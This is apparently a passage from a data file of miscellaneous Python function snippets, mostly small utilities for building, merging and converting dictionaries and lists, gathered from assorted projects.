coalesced_list_of_dicts:\n if list(item.keys())[0] not in dict_items:\n dict_items.update(item)\n found = True\n break\n if not found:\n coalesced_list_of_dicts.append(item)\n return coalesced_list_of_dicts", "def initialize(self, keys: List[str]):", "def list_to_dict(list_of_dicts):\n output = defaultdict(list)\n for dict_ in list_of_dicts:\n for key, value in dict_.items():\n dict_[key].append(value)\n return dict(output)", "def create_dicts():\n load_data_for_dict('data/atis/train/seq.in', 'data/atis/voc/vocabulary.json')\n load_data_for_dict('data/atis/valid/seq.in', 'data/atis/voc/vocabulary.json')\n load_data_for_dict('data/atis/test/seq.in', 'data/atis/voc/vocabulary.json') \n load_data_for_dict('data/atis/train/seq.out', 'data/atis/voc/slot_vocabulary.json')", "def iter_dict(iterator, keys, file_obj, defaults):\n result = []\n if len(keys):\n name = keys[0]\n rest = keys[1:]\n for item in resolve(iterator[name], **defaults):\n defaults['iter'][name] = item\n result += iter_dict(iterator, rest, file_obj, deepcopy(defaults))\n else:\n final_defaults = defaults\n final_defaults.update(resolve(file_obj.get('defaults', {}), **defaults))\n return [(file_obj, final_defaults)]\n return result", "def derive_url_dicts(self, url_obj_list):\n dict_list = []\n for url_obj in url_obj_list:\n dict_list.append(self.derive_url_dict(url_obj))\n return dict_list", "def setup_dict(self, keys=None):\n keys = keys or []\n return {key: True for key in keys}", "def update_dictionary_entries(word_list, the_dict):\n\tfor word in word_list:\n\t\tthe_dict[word] = True\n\treturn the_dict", "def createAllDictionaries(self):\r\n self.makeSentenceLengths()\r\n self.makeWords()\r\n self.makeStems()\r\n self.makeGerund()\r\n self.makeWordLengths()", "def builddictionary(dirlist):\n init_dictionary={}\n for string in dirlist:\n splitstring=string.split(\"\\t\")\n if len(splitstring) == 2:\n init_dictionary[splitstring[1].strip(\"\\n\")] = [int(splitstring[0]), 0]\n return init_dictionary", "def merge_dicts(listDicts) :\n return dict(itertools.chain.from_iterable([x.items() for x in listDicts]))", "def create_dicts_by_chain(keys_chain: list):\n result = {}\n current_dict = result\n for key in keys_chain:\n current_dict[key] = {}\n current_dict = current_dict[key]\n return result", "def build_keys():\n new_dct = {}\n with open( f'{stuff_dir}/02_source_booklist_2019-04-26.json', 'r', encoding='utf-8' ) as f:\n lst = json.loads( f.read() )\n for dct in lst:\n if dct['ISBN']: # some records are empty\n canonical_isbn = isbnlib.get_canonical_isbn( dct['ISBN'], output='isbn13' )\n new_dct[canonical_isbn] = { 'isbn_original': dct['ISBN'], 'title': dct['Title'], 'author': dct['Author'] }\n jsn = json.dumps( new_dct, sort_keys=True, indent=2 )\n log.debug( f'jsn, ```{jsn}```' )\n with open( f'{project_dir}/data/05_source_key_data.json', 'w', encoding='utf-8' ) as f:\n f.write( jsn )", "def init_data(stats_list):\n\n data = {stats_name: {} for stats_name in stats_list}\n return data", "def list_to_dict(list: list, keys: list):\n dictionary = dict()\n for key in keys:\n try:\n index = list.index(f'{key}:')\n dictionary[list[index].strip(':')] = list[index + 1]\n except ValueError:\n print(f'{key} not found!')\n return dictionary", "def from_list(self, lst: List[Tuple[keyType, valueType]]) -> None:\n key_size, value_size = self.size()\n if key_size > 0:\n # Clear the content of the existing custom dictionary object to the initial state.\n self.length = 10\n self.hashTable = [HeadNode() for i in range(self.length)]\n self.iter_head_node_index = 0\n self.iter_chain_node_index = -1\n self.iter_value_index = -1\n self.iter_values = []\n for element in lst:\n key = element[0]\n value = element[1]\n self.add(key, value)", "def dict_initialise(metadata, analysistype):\n for sample in metadata:\n sample[analysistype].dnaseq = dict()\n sample[analysistype].protseq = dict()\n sample[analysistype].ntindex = dict()\n sample[analysistype].aaindex = dict()\n sample[analysistype].ntalign = dict()\n sample[analysistype].aaalign = dict()\n sample[analysistype].aaidentity = dict()\n return metadata", "def _prefixed_items_from_list(items: List[namedtuple], item_prefix, prefix, tag_names: Set[str] = set([])):\n result = {}\n for index, nt in enumerate(items):\n result[\"%s%d\" % (item_prefix, index)] = _parse(nt, prefix, tag_names)\n return result", "def merge_animal_dict_list(dict_list):\n full = dict_list[0]\n for d in dict_list:\n full.update(d)\n return full", "def add_keys(destdict, srclist, value=None):\n if len(srclist) > 1:\n destdict[srclist[0]] = {}\n destdict[srclist[0]] = destdict.get(srclist[0], {})\n add_keys(destdict[srclist[0]], srclist[1:], value)\n else:\n destdict[srclist[0]] = value\n return destdict", "def secondary_keys_dicts(self):", "def list_flattened_to_dict(self, listH, defaultItem={}):\n dictList = defaultItem\n for name in reversed(listH):\n dictList = {name: dictList}\n return dictList", "def set_table_key(rows: List[Dict[str, str]], key: str) -> List[Dict[str, str]]:\n new_rows: List[Dict[str, str]] = []\n for row in rows:\n new_row = dict(row)\n new_row[\"_key\"] = new_row[key]\n new_rows.append(new_row)\n\n return new_rows", "def dictogram_dictlist(self):\n for key, value in self.word_dict.items():\n self.word_dict[key] = dictogram.Dictogram(value)\n # print(\"self.word_dict\", self.word_dict)", "def items_dict(slist, key=None):\n fields = slist.fields()\n items = [collections.OrderedDict((k, f) for k, f in zip(fields[0], item))\n for item in fields[1:]]\n if key:\n return collections.OrderedDict((i[key], i) for i in items)\n else:\n return items", "def create_dict(list_database):\n return_dict = dict()\n for key, value in list_database:\n if key != None:\n return_dict[key] = value\n return return_dict", "def iter_dicts(self, clean=False):\n for r in self.results:\n if clean:\n yield clean_dict(zip(self.attribute_names, r))\n else:\n yield dict(zip(self.attribute_names, r))", "def initpridict(cls):\n for i in range(len(clslist)):\n instcls = clslist[i]\n prilist = cls.pristage(instcls)\n configlist = cls.getConfigStages()\n tmpdict = dict()\n for j in range(len(configlist)):\n tmpdict.update(dict({configlist[j]: prilist[j]}))\n pridict.update(dict({instcls: tmpdict}))", "def initDictionary(bands):\r\n for x in bands:\r\n d[\"{}\".format(x)] = {ProdCost: [], AlbumSales: []}", "def init_from_dict(self, d):\n for k, v in d.items():\n # First, keys must be strings, not ints\n if isinstance(k, int):\n k = str(k)\n # Now, assign to the key, handling nested AttrDicts properly\n if isinstance(v, dict):\n self.set_key(k, AttrDict(v))\n elif isinstance(v, list):\n self.set_key(k, [i if not isinstance(i, dict) else AttrDict(i)\n for i in v])\n else:\n self.set_key(k, v)", "def prepare_looped_lines(self, alldict, comblist):\n loopline_dict=dict()\n for stridx in comblist:\n lidx = int(stridx.split('-')[0])\n loopidx = int(stridx.split('-')[1])\n loopline_dict[lidx] = alldict[lidx]['prepend'] + alldict[lidx]['looplist'][loopidx].strip() + alldict[lidx]['append'] + '\\n'\n return loopline_dict", "def crmdict2haresources(anydict):\n lst=[]\n for k in anydict.keys():\n d={}\n for subkey in anydict[k].keys() + ['name']:\n if subkey == 'name':\n d.setdefault(subkey, k)\n elif subkey == 'loadbalancers':\n numbalancers=len(anydict[k][subkey].keys())\n d.setdefault(subkey, [anydict[k][subkey]['ha%s' % lb] for lb in range(numbalancers)])\n elif subkey != 'members':\n d.setdefault(subkey, anydict[k][subkey])\n if 'type' not in d.keys():\n d.setdefault('type', 'ip')\n lst.append(d)\n return lst", "def _clean_up_loop_dict(loop_dict):\n \n # Remove the 'data_header' tag if it exists\n # since it is a list of dataframes\n # Then re-attach each of them one at a time\n if u'data_header' in loop_dict.keys():\n header_df_list = loop_dict.pop(u'data_header')\n \n if isinstance(header_df_list, list):\n for df in enumerate(header_df_list):\n loop_dict[u'data_header_'+str(df[0]+1)] = df[1]\n else:\n loop_dict[u'data_header_1'] = header_df_list\n \n return loop_dict", "def makeDict(result_list):\n \n result_dict = dict()\n for line in result_list:\n if line[0] == 'set_property' and line[3] == 'get_ports':\n if line[4] not in result_dict:\n result_dict[line[4]] = dict()\n result_dict[line[4]][line[1]] = line[2]\n\n return result_dict", "def create_topic_names_dict(self, topic_names_list):\n for item in topic_names_list:\n self.topic_names[int(item[0])] = item[1]", "def check_all_same_keys(dict_list, name):\n if len(dict_list) == 0:\n return\n keys = dict_list[0].keys()\n for dct in dict_list:\n if keys != dct.keys():\n raise DGLError('Expect all {} to have the same set of keys, but got'\n ' {} and {}.'.format(name, keys, dct.keys()))", "def preprocess(\n self, data: List[Dict[str, Any]]\n ) -> Generator[Dict[str, Any], None, None]:\n raise NotImplementedError", "def convertListToOrderedDict(inList, defaultValue=0):", "def from_iterable(iterables):\n for it in iterables:\n for element in it:\n if isinstance(element, dict):\n for key in element:\n yield key\n else:\n yield element", "def _parseDictionary(self):\n for i in self.na_dict.keys():\n setattr(self, i, self.na_dict[i])", "def prepare_hw_dict(dictData):\n\tresult = defaultdict(list)\n\tfor (hw, meanings, verse, verseNumDetails, pageNumDetails) in dictData:\n\t\tallHeadWords = [hw] + meanings\n\t\tfor itm in allHeadWords:\n\t\t\tresult[itm].append((hw, meanings, verse, verseNumDetails, pageNumDetails))\n\treturn result", "def buildDict(self, dict):\n for x in dict:\n self.EntireSet.append(x)\n print self.EntireSet", "def normalize_server_list_json(server_list):\n myservers = dict()\n global most_fields\n #most_fields = dict()\n #most_fields = {'none': 0} # too lazy to make complex condition\n\n for server in server_list:\n \"\"\"\n Iterate over servers and cherry pick wanted variables/data\n \"\"\"\n myservers[server['name']] = {\n \"name\": server['name'],\n \"flavor_id\": server['flavor']['id'],\n \"flavor_name\": str(server['flavor']['name']),\n \"image_id\": server['image']['id'],\n \"region_name\": server['location']['region_name'],\n \"project_id\": server['location']['project']['id'],\n \"access_ip4\": server['accessIPv4'],\n \"access_ip6\": server['accessIPv6'],\n \"interface_ip4\": server['interface_ip'],\n \"created_at\": server['created_at'],\n \"updated_at\": server['updated'],\n \"terminated_at\": server['terminated_at'],\n \"status\": server['status'],\n \"power_state\": server['power_state'],\n \"provider_ip_zone\": server['RAX-PUBLIC-IP-ZONE-ID:publicIPZoneId'],\n \"host_id\": server['host_id'],\n \"id\": server['id'],\n \"tenant_id\": server['tenant_id']\n }\n\n # @TODO: move this to function add checks when some fields are missing\n if len(server['volumes']) > 0:\n i = 0\n for vol in server['volumes']:\n myservers[server['name']].update({\n \"vol\" + str(i) + '_id': vol['id'],\n \"vol\" + str(i) + '_name': vol['name'],\n \"vol\" + str(i) + '_status': vol['status'],\n \"vol\" + str(i) + '_size': vol['size'],\n \"vol\" + str(i) + '_created_at': vol['created_at'],\n \"vol\" + str(i) + '_updated_at': vol['updated_at'],\n \"vol\" + str(i) + '_type': vol['volume_type'],\n \"vol\" + str(i) + '_device': vol['device'],\n \"vol\" + str(i) + '_storage_node': vol['metadata']['storage-node'],\n #\"vol\" + str(i) + '_storage_mode': vol['metadata']['attached_mode'],\n \"vol\" + str(i) + '_server_id': vol['attachments'][0]['server_id'],\n \"vol\" + str(i) + '_attachment_id': vol['attachments'][0]['attachment_id'],\n \"vol\" + str(i) + '_host_name': vol['attachments'][0]['host_name'],\n \"vol\" + str(i) + '_volume_id': vol['attachments'][0]['volume_id'],\n \"vol\" + str(i) + '_az': vol['availability_zone']\n })\n i = i + 1\n\n else:\n myservers[server['name']].update({\n \"additional_storage\": 0\n })\n\n if int(len(myservers[server['name']])) > int(list(most_fields.values())[-1]):\n most_fields = dict()\n most_fields[server['name']] = int(len(myservers[server['name']]))\n\n # @TODO: add iteration via server['metadata'] when len > 0\n # @TODO: add iteration via server['properties'] when len > 0\n # @TODO: add iteration via server['addresses'] and dynamically add 'networks - Galaxy, public, private ..'\n\n return myservers", "def testLoadFromFileToDictKeyItemOrderingAcademic(self):\n list_of_academic = self.loaded_json_dict[self.expected_dict_keys[0]]\n self.assertEqual(list_of_academic[0].get_title(), self.academic_title)", "def prepare_looped_datasets(self, alldict, allcombs):\n datasets_dict=dict()\n numcombs = len(allcombs)\n combct = 0\n while combct < numcombs:\n newdata = list(self.baseinput.data)\n loopedlines = dict()\n loopedlines = self.prepare_looped_lines(alldict, allcombs[combct])\n for lvalidx in loopedlines.keys():\n newdata[lvalidx] = loopedlines[lvalidx]\n datasets_dict[combct] = newdata\n combct = combct + 1\n return datasets_dict", "def fix_json_keys(self, obj, callback):\n if type(obj) == list:\n newlist = []\n for item in obj:\n newlist.append(self.fix_json_keys(item, callback))\n return newlist\n elif type(obj) == dict:\n newdict = {}\n for item in list(obj):\n if type(obj[item]) == list or type(obj[item]) == dict:\n newdict[callback(item)] = self.fix_json_keys(obj[item], callback)\n else:\n newdict[callback(item)] = obj[item]\n return newdict", "def structure_user_dict_list(khoros_object=None, user_dicts=None, id_list=None, login_list=None):\n if not any((user_dicts, id_list, login_list)):\n raise errors.exceptions.MissingRequiredDataError(\"At least one of the required function arguments (i.e. \"\n \"'user_dicts', 'id_list' or 'login_list') must be provided.\")\n\n # Ensure that the user dictionary list is in the correct format\n user_dicts = [] if not user_dicts else user_dicts\n ids_from_dicts, logins_from_dicts = [], []\n if user_dicts:\n if isinstance(user_dicts, tuple):\n user_dicts = list(user_dicts)\n elif isinstance(user_dicts, dict):\n user_dicts = [user_dicts]\n user_dicts = core_utils.convert_dict_id_values_to_strings(user_dicts)\n ids_from_dicts = core_utils.extract_key_values_from_dict_list('id', user_dicts)\n logins_from_dicts = core_utils.extract_key_values_from_dict_list('login', user_dicts, exclude_if_present='id')\n\n # Retrieve the IDs from the list of logins if applicable\n ids_from_dicts.append(get_ids_from_login_list(khoros_object, logins_from_dicts))\n\n # Ensure that the supplied ID and login lists are in the correct format\n id_list = [] if not id_list else list(id_list)\n id_list = core_utils.convert_list_values(id_list, convert_to='str')\n login_list = [] if not login_list else list(login_list)\n\n # Add the IDs from the login list to the existing IDs list\n id_list.extend(get_ids_from_login_list(khoros_object, login_list))\n\n # Populate and return the final user dictionary list\n final_dict_list = []\n for user_id in id_list:\n final_dict_list.append({\"id\": str(user_id)})\n return final_dict_list", "def get_keys_from_list():\n json_data = request.get_json()\n\n d = dict()\n d['elements'] = list()\n settings.setOptionsFile(get_info('uid'))\n fn = settings.getHistoROOTFileName()\n rfn = settings.getReferenceROOTFileName()\n# open root file stored in the root database\n f = ROOT.TFile(fn)\n# open reference root file stored in the root database\n rf = ROOT.TFile(rfn)\n\n for values in json_data.itervalues():\n for k in values:\n subd = dict()\n subd[\"index\"] = k[\"index\"]\n if fn != k[\"file\"]: \n fn = k[\"file\"]\n settings.setHistoROOTFileName(fn)\n f = ROOT.TFile(fn)\n print \"histogram :>>>>>: \",k[\"histogram\"]\n subd[\"data\"] = eval(cppyy.gbl.getDictionary(f,k[\"histogram\"]))\n if rfn != k[\"referenceFile\"]: \n rfn = k[\"referenceFile\"]\n settings.setReferenceROOTFileName(rfn)\n rf = ROOT.TFile(rfn)\n subd[\"refdata\"] = eval(cppyy.gbl.getDictionary(rf,k[\"reference\"]))\n d['elements'].append(subd)\n\n f.Close()\n rf.Close()\n\n return jsonify(d)", "def test_dictify(self) -> None:\n r = dictify(['a', 'b', 'c'], [1, 2, 3])\n assert r == {'a': 1, 'b': 2, 'c': 3}, r\n\n r = {}\n dictify(['a'], [1], r)\n dictify(['b'], [2], r)\n dictify(['c'], [3], r)\n assert r == {'a': 1, 'b': 2, 'c': 3}, r", "def group_list_dict(matches, keys):\n target = collections.OrderedDict((key, []) for key in keys)\n for entry in matches:\n if entry is None:\n continue\n for key, value in entry.items():\n target[key].append(value)\n return target", "def list_to_dict_keys(list):\n dictionary = defaultdict(list)\n for item in list:\n dictionary[item] = ''\n return dictionary", "def dictupdate(*args):\n output = {}\n for dict in args:\n output.update(dict)\n return output", "def build_unq_dict_lst(self, lst1, lst2, key1 = \"start_index\", key2 = \"random_seed\"):\n dict_lst = []\n for i in range(len(lst1)):\n for j in range(len(lst2)):\n dictt = {}\n dictt[key1] = lst1[i]\n dictt[key2] = lst2[j]\n dict_lst.append(dictt)\n return dict_lst", "def navigate_case_dictionary(case_list_for_run, num_cases):", "def test_load_from_file_to_dict_key_names(self):\n self.assertEqual(list(self.loaded_json_dict), self.expected_dict_keys)", "def make_dicts(self):\n self._dicts = [tree.to_dict() for tree in self.reaction_trees]\n self._update_route_dict(self._dicts, \"dict\")", "def split_dictionary(dict_to_split, bases):\n dicts = list()\n for base in bases:\n if isinstance(base, dict):\n base_keys = base.keys()\n else:\n base_keys = base\n new_dict = dict()\n for key, value in dict_to_split.items():\n if key in base_keys:\n new_dict[key] = value\n dicts.append(new_dict)\n return dicts", "def init_objects(config_dict):\n # only testing purposes\n obj_list = dict()\n obj_list['input_cfg'] = config_dict\n return obj_list", "def buildDict(self, dict):\n for item in dict:\n length = len(item)\n if length not in self.dic:\n self.dic[length] = [item]\n else:\n self.dic[length].append(item)", "def addtodictionary(dict, dirlist):\n for string in dirlist:\n splitstring=string.split(\"\\t\")\n if len(splitstring) == 2:\n if splitstring[1].strip(\"\\n\") in dict:\n dict[splitstring[1].strip(\"\\n\")][1] = int(splitstring[0])\n else:\n dict[splitstring[1].strip(\"\\n\")] = [0, int(splitstring[0])]\n return dict", "def all_key_seqs(template):\n result = []\n for k, v in template.iteritems():\n if isinstance(v, dict):\n for suffix in all_key_seqs(v):\n result.append([k] + suffix)\n else:\n result.append([k])\n return result", "def nested_dict():\n try:\n num_list = [1, 2, 3, 4]\n new_dict = current = {}\n for name in num_list:\n current[name] = {}\n current = current[name]\n print(new_dict)\n except ValueError as e:\n logger.error(\"Not find the dictnary\"+str(e))", "def preprocessing_dict(selected_preprocessing_steps, reference_dict,stopwords, stemmer):\n list_keys = list(reference_dict.keys())\n list_values = list(reference_dict.values())\n list_keys_final = list_keys.copy()\n for i in selected_preprocessing_steps:\n if i == \"lowercase\":\n print(\"Lowercasing terms...\")\n list_keys_final = lowercase(list_keys_final)\n elif i == \"stopwords\":\n print(\"Removing stopwords...\")\n list_keys_final = remove_stopwords(list_keys_final,stopwords)\n elif i == \"stemming\":\n print(\"Stemming terms...\")\n list_keys_final = stemming(list_keys_final, stemmer)\n elif i == \"lematization\":\n print(\"lematization\")\n elif i == \"accents\":\n print(\"Normalizing accents...\")\n list_keys_final = strip_accents(list_keys_final)\n else:\n print(\"Preprocessing step not available\")\n reference_dict = dict(zip(list_keys_final,list_values))\n return reference_dict", "def string_factory(list_of_dicts):\n result = []\n for item in range(len(list_of_dicts)):\n result.append(template.format(**list_of_dicts[item]))\n return result", "def check_all_have_keys(dict_list, keys, name):\n if len(dict_list) == 0:\n return\n keys = set(keys)\n for dct in dict_list:\n if not keys.issubset(dct.keys()):\n raise DGLError('Expect all {} to include keys {}, but got {}.'.format(\n name, keys, dct.keys()))", "def setup_dict(data, required=None, defaults=None):\n required = required or []\n for i in set(required) - set(data):\n raise IndexError(\"Missed: %s\" % i)\n\n defaults = defaults or {}\n for i in set(data) - set(required) - set(defaults):\n raise ValueError(\"Unexpected: %s\" % i)\n\n defaults.update(data)\n return defaults", "def setup_dict(data, required=None, defaults=None):\n required = required or []\n for i in set(required) - set(data):\n raise IndexError(\"Missed: %s\" % i)\n\n defaults = defaults or {}\n for i in set(data) - set(required) - set(defaults):\n raise ValueError(\"Unexpected: %s\" % i)\n\n defaults.update(data)\n return defaults", "def setdefault(*dicts):\n param_complete = dict(dicts[0])\n for d in dicts[1:]:\n for k,v in d.items():\n param_complete.setdefault(k, v)\n\n return param_complete", "def combine_dict_in_json(dict_list, destination, json_name):\n new_dict = {}\n for k in dict_list[0].keys():\n new_dict[k] = tuple(new_dict[k] for new_dict in dict_list)\n\n with open(destination + '/' + json_name + '.json', 'w') as fp:\n json.dump(new_dict, fp, indent=1)", "def _try_set(set_list, index, nested_dict, dict_keys=[]):\n try:\n for dict_key in dict_keys:\n nested_dict = nested_dict.__getitem__(dict_key)\n set_list[index] = str(nested_dict)\n return nested_dict\n except:\n return ''", "def update_from_base(base_dict, updated_dict):\n tools_list = []\n updated_names = []\n base_tools = {}\n # load base tools list in dict\n for tool in base_dict['tools']:\n # print(f\"Tool name is {tool['name']}\")\n # Just alert of duplicated entries, but keep the last entry\n if 'tool_panel_section_label' in tool.keys():\n entry_key = tool['name'] + '_' + tool['tool_panel_section_label']\n else:\n entry_key = tool['name'] + '_' + tool['tool_panel_section_id']\n if entry_key in base_tools.keys():\n # print(entry_key)\n print(f'Duplicated entry key in base tool list: {entry_key}')\n base_tools[entry_key] = tool\n\n # iterate over the updated list\n for tool in updated_dict['tools']:\n new_entry = {}\n new_entry['name'] = tool['name']\n new_entry['owner'] = tool['owner']\n if 'tool_panel_section_label' in tool.keys():\n dict_key = tool['name'] + '_' + tool['tool_panel_section_label']\n else:\n dict_key = tool['name'] + '_' + tool['tool_panel_section_id']\n if dict_key in base_tools.keys():\n print(base_tools[dict_key],tool['revisions'])\n new_entry['revisions'] = update_revisions(dict_key, base_tools[dict_key],\n tool['revisions'])\n else:\n new_entry['revisions'] = [tool['revisions'][0]]\n\n # some tool entries dont define a tool_panel_section_label but a tool_panel_section_id\n # assert new_entry['tool_panel_section_label'] in section_labels_list\n if 'tool_panel_section_label' in tool.keys():\n new_entry['tool_panel_section_label'] = tool['tool_panel_section_label']\n else:\n if 'tool_panel_section_id' in tool.keys():\n new_entry['tool_panel_section_id'] = tool['tool_panel_section_id']\n else:\n sys.exit(f\"No panel definition for tool {tool['name']}\")\n\n # store the names of the udpated tools\n updated_names.append(new_entry['name'])\n\n tools_list.append(new_entry)\n\n for tool in base_dict['tools']:\n if tool['name'] not in updated_names:\n tools_list.append(tool)\n\n ret_dict = {\n 'install_repository_dependencies': True,\n 'install_resolver_dependencies': True,\n 'install_tool_dependencies': False,\n 'tools': tools_list\n }\n return ret_dict", "def create_lside(source_dict_list):\n\n lside_dict_list = []\n\n for source_dict in source_dict_list: # Iterando sobre a lista de dicionário original\n\n lside_dict = {} # Cria um novo dicionario para cada dicionário da lista original\n\n for chave in source_dict.keys(): # Iterando sobre as chaves do cionario atual\n\n if chave[0].isnumeric() == False: # So nos interessa as chaves não numericas\n lside_dict[chave] = source_dict[chave]\n\n lside_dict_list.append(lside_dict)\n\n return lside_dict_list", "def _parse() -> None:\n for obj in training_settings:\n if isinstance(obj, list):\n training_settings[obj] = [dict(value) for value in obj]", "def combine_dicts(dicts_list):\n\n # Combine all dictionarys keys into a single\n # list and find the unique set of them.\n all_keys = []\n for freq_dict in dicts_list:\n all_keys += list(freq_dict.keys())\n keys = set(all_keys)\n\n # Generate the new dictionary with all keys\n combined_dict = {key: 0 for key in keys}\n\n # Iterate over the list of keys so that\n # the memory access pattern to the combined_dict\n # avoids jumping around. If key is not found in\n # a given fdict, just pass over.\n for key in keys:\n for fdict in dicts_list:\n try:\n combined_dict[key] += fdict[key]\n except:\n pass\n\n return combined_dict", "def normalise_parameter(dict_of_dicts):\n new_inputs = []\n for key, inner_dict in dict_of_dicts.items():\n if not isinstance(inner_dict, dict):\n inner_dict = { 'type': inner_dict }\n inner_dict['id'] = key\n new_inputs.append(inner_dict)\n return new_inputs", "def _from_dicts(records, fieldnames=None):\n if fieldnames:\n fieldnames = list(fieldnames) # Needs to be a sequence.\n yield fieldnames # Header row.\n else:\n records = iter(records)\n first_record = next(records, None)\n if first_record:\n fieldnames = list(first_record.keys())\n yield fieldnames # Header row.\n yield list(first_record.values())\n\n for row in records:\n yield [row.get(key, None) for key in fieldnames]", "def __init__(self, proteins_dict):\n \n self.proteins_dict = proteins_dict\n self.proteins = list(proteins_dict.keys())", "def get_titles_and_links(list_of_urls, main_url):\n target = {url: {} for url in list_of_urls}\n for url in list_of_urls:\n content = urlopen(url).read()\n\n soup = BeautifulSoup(content, \"html.parser\")\n\n title = soup.title.string\n if title:\n target[url] = {'title': title}\n else:\n target[url] = {'title': 'No links here'}\n\n # I have to make list because .json file can't recognise sets and json.dump() doesn't work.\n\n links = list({urljoin(url, link.get('href')) for link in soup.find_all('a') if main_url in urljoin(url, link.get('href'))})\n\n if not links:\n target[url]['links'] = 'set()'\n else:\n target[url]['links'] = links\n\n return target", "def buildDict(self, dict):\n for word in dict:\n self.add(word)", "def affixes(etymologies):\n for affix in AFFIXES:\n name = FIRST(affix.groupindex.keys())\n print('building {} dictionary...'.format(name))\n dictionary = defaultdict(list)\n with ProgressBar(maxval=len(etymologies)) as progress:\n for i, key in enumerate(etymologies):\n for definition in etymologies[key]:\n if definition.has_key(name):\n dictionary[key].append(definition)\n progress.update(i)\n yield name, dictionary", "def add_dicts(*args):\n new = {}\n for arg in args:\n for key in arg:\n if key in new:\n raise ValueError(\"Duplicate key: %r\" % key)\n new[key] = arg[key]\n return new", "def setup():\n global definitions\n\n # fully replace dict with AttrDict\n complete = AttrDict({})\n for k, v in definitions.items():\n data = AttrDict({})\n data.create = v['create'] if 'create' in v else 'create_' + v['stem']\n data.fetch = v['fetch'] if 'fetch' in v else v['stem'] + 's'\n data.destroy = v['destroy'] if 'destroy' in v else 'delete'\n complete[k] = data\n definitions = complete\n\n global _existing\n for r in definitions.keys():\n _existing[r] = _fetch(r)", "def _from_dict(self, data=None):\n for key in self.shopkeys:\n setattr(self, key, getattr(data, key))", "def setUp(self):\n cwd = Path(__file__).parent.absolute()\n with open(f'{cwd}/test.json', 'r') as f:\n default = json.load(f)\n\n for data in default['results']:\n set_id = data.pop('set_id')\n products_data = data.pop('products')\n\n set_obj = Set.objects.create(id=set_id)\n\n spl_obj = set_obj.spls.create(**data)\n\n for product_data in products_data:\n product_data.pop('name')\n packages_data = product_data.pop('packages')\n if 'inactive_ingredients' in product_data:\n inactive_ingredients_data = product_data\\\n .pop('inactive_ingredients')\n\n inactive_ingredients_list = []\n for inactive_ingredient_data in inactive_ingredients_data:\n try:\n ingredient = InactiveIngredient.objects.get(\n **inactive_ingredient_data\n )\n inactive_ingredients_list.append(ingredient)\n except Exception:\n ingredient = InactiveIngredient.objects.create(\n **inactive_ingredient_data\n )\n inactive_ingredients_list.append(ingredient)\n\n product_obj = spl_obj.products.create(**product_data)\n product_obj.inactive_ingredients\\\n .add(*inactive_ingredients_list)\n\n for package_data in packages_data:\n product_obj.packages.create(**package_data)", "def _populate_attributes(self, obj, traverse_list=True):\n for key, value in obj.__dict__.items():\n if isinstance(value, dict):\n obj.__dict__[key] = self._reconstruct_object(value)\n elif isinstance(value, list):\n obj.__dict__[key] = [self._reconstruct_object(details) for details in value]\n if traverse_list:\n # Iterate through each season in the list of seasons\n for season in obj.__dict__[key]:\n self._populate_attributes(season, traverse_list=False)", "def additional_data_dict(titles: list) -> dict or str:\n try:\n additional_data = {}\n for title in titles:\n url = \"http://www.omdbapi.com/?i=tt3896198&apikey=6b513db6&t=\" + title\n headers = {\"Accept\": \"application/json\"}\n req = requests.get(url, headers=headers)\n api_content = json.loads(req.content.decode('utf-8'))\n # Because of no BoxOffice key in API for movie 'Ben Hur' (ID 68 in db):\n api_content.setdefault('BoxOffice', 'N/A')\n additional_data[title] = {}\n if api_content['imdbRating']:\n additional_data[title]['imdb_rating'] = float(api_content['imdbRating'])\n else:\n additional_data[title]['imdb_rating'] = -1\n if api_content['Runtime'] == 'N/A':\n additional_data[title]['runtime'] = -1\n else:\n additional_data[title]['runtime'] = int(re.sub(r'[^0-9]', '', api_content['Runtime']))\n if api_content['BoxOffice'] == 'N/A':\n additional_data[title]['box_office'] = -1\n else:\n additional_data[title]['box_office'] = int(re.sub(r'[^0-9]', '', api_content['BoxOffice']))\n nominations_oscars = re.search(r'Nominated for (.+?) Oscar', api_content['Awards'])\n if nominations_oscars:\n additional_data[title]['nominations_oscars'] = int(nominations_oscars.group(1))\n else:\n additional_data[title]['nominations_oscars'] = 0\n oscars = re.search(r'Won (.+?) Oscar', api_content['Awards'])\n if oscars:\n additional_data[title]['oscars'] = int(oscars.group(1))\n else:\n additional_data[title]['oscars'] = 0\n nominations_others = re.search(r'(\\d+) nomination', api_content['Awards'])\n if nominations_others:\n additional_data[title]['nominations_others'] = int(nominations_others.group(1))\n else:\n additional_data[title]['nominations_others'] = 0\n wins_others = re.search(r'(\\d+) win', api_content['Awards'])\n if wins_others:\n additional_data[title]['wins_others'] = int(wins_others.group(1))\n else:\n additional_data[title]['wins_others'] = 0\n return additional_data\n except KeyError:\n return \"No data about some movie(s). Check data source.\"\n except requests.exceptions.ConnectionError:\n return \"No access. Check internet connection or API is down.\"", "def make_dict(data_for_dict): \n \n column_name_list = data_for_dict[0]\n db_list = data_for_dict[1:]\n \n column_list1 = []\n column_list2 = []\n column_list3 = []\n column_list4 = []\n column_list5 = []\n column_list6 = []\n column_list7 = []\n column_list8 = []\n column_list9 = []\n column_list10 = []\n column_list11 = []\n hmdb_dict = {}\n for line in db_list:\n my_string1 = '' \n my_string2 = ''\n my_string3 = ''\n my_string4 = ''\n my_string5 = ''\n my_string6 = ''\n my_string7 = ''\n my_string8 = ''\n my_string9 = ''\n my_string10 = ''\n my_string11 = ''\n\n my_string1 = line[0]\n column_list1 += [my_string1]\n my_string2 += line[1]\n column_list2 += [my_string2]\n my_string3 += line[2]\n column_list3 += [my_string3]\n my_string4 += line[3]\n column_list4 += [my_string4]\n my_string5 += line[4]\n column_list5 += [my_string5]\n my_string6 += line[5]\n column_list6 += [my_string6]\n my_string7 += line[6]\n column_list7 += [my_string7]\n my_string8 += line[7]\n column_list8 += [my_string8]\n my_string9 += line[8]\n column_list9 += [my_string9]\n my_string10 += line[9]\n column_list10 += [my_string10]\n my_string11 += line[10]\n column_list11 += [my_string11] \n \n hmdb_dict[column_name_list[0]] = column_list1\n hmdb_dict[column_name_list[1]] = column_list2\n hmdb_dict[column_name_list[2]] = column_list3\n hmdb_dict[column_name_list[3]] = column_list4\n hmdb_dict[column_name_list[4]] = column_list5\n hmdb_dict[column_name_list[5]] = column_list6\n hmdb_dict[column_name_list[6]] = column_list7\n hmdb_dict[column_name_list[7]] = column_list8\n hmdb_dict[column_name_list[8]] = column_list9\n hmdb_dict[column_name_list[9]] = column_list10\n hmdb_dict[column_name_list[10]] = column_list11\n \n return (hmdb_dict)", "def _dict_keys(typingctx, d):\n resty = types.DictKeysIterableType(d)\n sig = resty(d)\n codegen = _iterator_codegen(resty)\n return sig, codegen", "def _init_dict(self):\n 